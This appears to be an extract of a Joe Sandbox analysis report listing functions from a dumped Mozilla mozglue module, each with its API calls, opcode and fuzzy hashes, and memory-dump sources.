                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c8f8952525acbdf5ec049495edde3a86382c7930065437aa7b6a53a211bd6dae
                                                                                                                                                                                                                                                                                        • Instruction ID: 8d238e5c3d009862783805b174708fe9cf32d3a4f99a8e378c258a7e5e44e6cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8f8952525acbdf5ec049495edde3a86382c7930065437aa7b6a53a211bd6dae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D23141B1A012159FDB50DF758D44AABB7F8EF58614F15882DE84AE7700EB34E804CBE1
                                                                                                                                                                                                                                                                                        Function 6C9C5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C9DDCA0,?,?,?,6C99E8B5,00000000), ref: 6C9C5F1F
                                                                                                                                                                                                                                                                                        • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C99E8B5,00000000), ref: 6C9C5F4B
                                                                                                                                                                                                                                                                                        • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C99E8B5,00000000), ref: 6C9C5F7B
                                                                                                                                                                                                                                                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C99E8B5,00000000), ref: 6C9C5F9F
                                                                                                                                                                                                                                                                                        • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C99E8B5,00000000), ref: 6C9C5FD6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1389714915-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d66362db589873d54aeeeb43c45e9493e9b6d1e38b31716bdee07e0a57416776
                                                                                                                                                                                                                                                                                        • Instruction ID: f9a414590b26973a5c6b41311ddc472288af0665b7a483b6a58faf607ac434de
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d66362db589873d54aeeeb43c45e9493e9b6d1e38b31716bdee07e0a57416776
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E03138343046008FD724CF29C898F2AB7F9FF99318BA48558E5668BB95C731EC51CB82
                                                                                                                                                                                                                                                                                        Function 6C96B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C96B532
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C96B55B
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C96B56B
                                                                                                                                                                                                                                                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C96B57E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C96B58F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c11e3f7289597cbcc5e0bd36536f0288c6905140716c5237bf3c5d2e4a72c91b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9676f5cb0f075f62f2fbce5dfb6d78c64c86fa631dfeadf3c0c4aecc2c99451f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c11e3f7289597cbcc5e0bd36536f0288c6905140716c5237bf3c5d2e4a72c91b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9821F671A042059BEB008F69CC40BAABBB9FF95304F284029F918DB781F735D911D7A0
                                                                                                                                                                                                                                                                                        Function 6C96B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C96B7CF
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C96B808
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C96B82C
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C96B840
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C96B849
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1977084945-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38696a40bf363a12f01caf95f3a4597e19d2617e6179f54d41b869e98a775811
                                                                                                                                                                                                                                                                                        • Instruction ID: f04d3f227f4fdd24db87a901b461dade1ad1ea0155ef6e00bc8cb938877be69d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38696a40bf363a12f01caf95f3a4597e19d2617e6179f54d41b869e98a775811
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F215AB0E04209DFEF04DFA9C8855BEBBB8EF59314F148169EC45A7740E731A944CBA0
                                                                                                                                                                                                                                                                                        Function 6C9C6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C9C6E78
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: InitializeCriticalSection.KERNEL32(6C9EF618), ref: 6C9C6A68
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: GetCurrentProcess.KERNEL32 ref: 6C9C6A7D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: GetCurrentProcess.KERNEL32 ref: 6C9C6AA1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: EnterCriticalSection.KERNEL32(6C9EF618), ref: 6C9C6AAE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C9C6AE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C9C6B15
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C9C6B65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6A10: LeaveCriticalSection.KERNEL32(6C9EF618,?,?), ref: 6C9C6B83
                                                                                                                                                                                                                                                                                        • MozFormatCodeAddress.MOZGLUE ref: 6C9C6EC1
                                                                                                                                                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C9C6EE1
                                                                                                                                                                                                                                                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C9C6EED
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C9C6EFF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4058739482-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f283a17b2233ecdbf812ba55fb5281c06d006ac7248655bfb3534f889911fc7e
                                                                                                                                                                                                                                                                                        • Instruction ID: 9a514d0739917882f9128245c3c7b55b6cc8dcf3d83f7db51e57820c8a551ee8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f283a17b2233ecdbf812ba55fb5281c06d006ac7248655bfb3534f889911fc7e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E21B071A0831A9FCB10CF29D8856AA77F8EF98308F044439E80997241EB709A58CF92
                                                                                                                                                                                                                                                                                        Function 6C9C76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C9C76F2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001), ref: 6C9C7705
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C9C7717
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C9C778F,00000000,00000000,00000000,00000000), ref: 6C9C7731
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9C7760
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2538299546-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b1eaf56e250ac82d37b772605de671da192c71eaeb671a7cd84be5c975e220eb
                                                                                                                                                                                                                                                                                        • Instruction ID: d52661ecbf95237a25dd3d29943d3910ed5ab990e227816723e57f206e13585f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1eaf56e250ac82d37b772605de671da192c71eaeb671a7cd84be5c975e220eb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 621190B1A052156BE710AF668C44AABBEF8EF55654F144829E848A7200E77098548BF2
                                                                                                                                                                                                                                                                                        Function 6C9A0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C963DEF), ref: 6C9A0D71
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C963DEF), ref: 6C9A0D84
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C963DEF), ref: 6C9A0DAF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 13d0055dd888e41ae2e57a661cbe92771d323b042da8a43052cf6b1aec567cb6
                                                                                                                                                                                                                                                                                        • Instruction ID: d982ac9fb48c8b7aeabaa9a5a8c4f6cee19f3b4e79d3bbace27396da2ed3256f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13d0055dd888e41ae2e57a661cbe92771d323b042da8a43052cf6b1aec567cb6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F02E3238439423E72522E61C0AF5A366D6FD6F64F305035F206DEDC0DA54E8064AA8
                                                                                                                                                                                                                                                                                        Function 6C9B7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C9B75C4,?), ref: 6C9B762B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C9B74D7,6C9C15FC,?,?,?), ref: 6C9B7644
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B765A
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9B74D7,6C9C15FC,?,?,?), ref: 6C9B7663
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9B74D7,6C9C15FC,?,?,?), ref: 6C9B7677
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 418114769-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 594baa9caa169c7835f78488854942f2633f4480938952538144afbccb6ea9f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 88f185f8297259e946eca080387f95dafdc61af260dd92aeeb9b440f48701064
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 594baa9caa169c7835f78488854942f2633f4480938952538144afbccb6ea9f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF0C271E14746ABD7008F21C888676B778FFFA259F21431AF90543601E7B0A5D08BD0
                                                                                                                                                                                                                                                                                        Function 6C9C1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9C1800
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9A3EBD,6C9A3EBD,00000000), ref: 6C9642A9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                                                                                                                                        • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                                                                                                                                        • API String ID: 46770647-1733325692
                                                                                                                                                                                                                                                                                        • Opcode ID: fee2b214a680f47438e61b77b0216ba945931e780fc753b636b8ea08f65b0d73
                                                                                                                                                                                                                                                                                        • Instruction ID: 791a978e082b28edaee63a6c353ca2e27af3217898c13102eb9902183ba7a4c9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fee2b214a680f47438e61b77b0216ba945931e780fc753b636b8ea08f65b0d73
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4971F370A047469FDB04CF28D4907AABBB1FFAA314F14466DD8154BB41DB70E698CBE2
                                                                                                                                                                                                                                                                                        Function 6C9CB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,6C9CB0A6,6C9CB0A6,?,6C9CAF67,?,00000010,?,6C9CAF67,?,00000010,00000000,?,?,6C9CAB1F), ref: 6C9CB1F2
                                                                                                                                                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C9CB0A6,6C9CB0A6,?,6C9CAF67,?,00000010,?,6C9CAF67,?,00000010,00000000,?), ref: 6C9CB1FF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C9CB0A6,6C9CB0A6,?,6C9CAF67,?,00000010,?,6C9CAF67,?,00000010), ref: 6C9CB25F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$Xlength_error@std@@
                                                                                                                                                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                        • API String ID: 1922495194-1285458680
                                                                                                                                                                                                                                                                                        • Opcode ID: 7a9434f3119588f2f4608b350b3403c589de5d7dfae139df5d46d1df9c284437
                                                                                                                                                                                                                                                                                        • Instruction ID: 85520918705c6aea235ba21366db60746784f812a42322285f549ca47e56eb68
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a9434f3119588f2f4608b350b3403c589de5d7dfae139df5d46d1df9c284437
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB6199347042459FD701CF19C880A9ABBF5FF5A328F28C5A9D8599BB52C331ED45CBA2
                                                                                                                                                                                                                                                                                        Function 6C98D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D4F2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D50B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96CFE0: EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C96CFF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96CFE0: LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C96D026
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D52E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C98D690
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D751
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                        • Opcode ID: 3775574062bbb6ef012d05d7cde1baafa6f535e1a008d83b71a272ab001ac0e9
